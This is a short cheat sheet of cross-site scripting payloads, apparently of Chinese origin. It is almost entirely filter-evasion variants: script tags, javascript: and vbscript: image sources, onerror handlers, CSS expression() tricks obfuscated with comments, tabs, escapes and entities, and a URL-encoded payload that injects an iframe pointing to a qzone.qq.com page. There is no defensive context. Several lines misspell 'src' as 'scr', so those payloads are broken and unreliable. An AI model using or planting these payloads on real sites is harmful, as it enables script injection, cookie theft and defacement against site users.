<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (???? marks whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["